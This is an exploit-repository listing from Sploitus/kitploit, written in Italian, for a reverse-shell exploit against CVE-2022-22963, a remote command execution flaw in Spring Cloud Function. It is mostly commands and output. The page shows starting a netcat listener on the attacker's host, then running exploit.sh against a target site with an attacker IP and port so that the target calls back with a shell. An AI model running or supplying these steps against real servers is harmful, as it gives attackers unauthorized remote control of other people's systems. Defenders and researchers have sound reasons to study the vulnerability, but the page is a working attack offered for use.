Sploitus

Exploit for RCE-in-Spring-Cloud

kitploit · 2026-08-27

Exploit Code

MARKDOWN39 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-NIKN0LATY-RCE-IN-SPRING-CLOUD-CVE-2022-22963
# Exploit per RCE in Spring Cloud (CVE 2022-22963)

Exploit per l'esecuzione remota di comandi **CVE-2022-22963** in Spring Cloud Function

Vedi i dettagli sulla vulnerabilità **qui** e **qui**

## PoC

Esegui netcat sul tuo host:

root@kitploit:~
    
    
    $ nc -lvnp 9001
    

Esegui l'exploit (esempio) con la porta predefinita **`9001`** sull'host dell'attaccante:

root@kitploit:~
    
    
    $ ./exploit.sh site.com 10.10.14.122
    ---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
    [*] Input target is site.com
    [*] Input attacker is 10.10.14.122:9001
    [*] Done
    

Esegui l'exploit (esempio) con la porta specificata **`1337`** sull'host dell'attaccante:

root@kitploit:~
    
    
    $ ./exploit.sh site.com 10.10.14.122 1337
    ---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
    [*] Input target is site.com
    [*] Input attacker is 10.10.14.122:1337
    [*] Done